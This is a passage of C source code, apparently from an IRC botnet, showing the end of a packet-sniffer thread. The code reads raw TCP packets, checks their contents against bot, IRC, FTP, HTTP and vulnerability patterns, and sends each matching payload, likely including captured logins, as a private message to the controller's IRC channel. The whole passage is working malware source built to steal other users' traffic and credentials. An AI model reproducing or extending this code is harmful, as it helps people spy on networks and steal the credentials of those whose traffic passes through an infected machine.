         iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); 
          
         if(iSrcPort !=110 && iSrcPort!=25 && 
            iDestPort !=110 && iDestPort!=25) 
         { 
         sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); 
         sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); 

         szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); 
         for(int i=0; i<(int)strlen(szPacket); i++) { 
            if(szPacket[i]=='\r') szPacket[i]='\x20'; 
            if(szPacket[i]=='\n') szPacket[i]='\x20'; } 

         if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 


         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(IsSuspiciousHTTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
         else if(IsSuspiciousVULN(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
      } 
   } 
   } 
   fclosesocket(sock); 
   clearthread(sniff.threadnum); 
   ExitThread(0); 
   return 0; 
}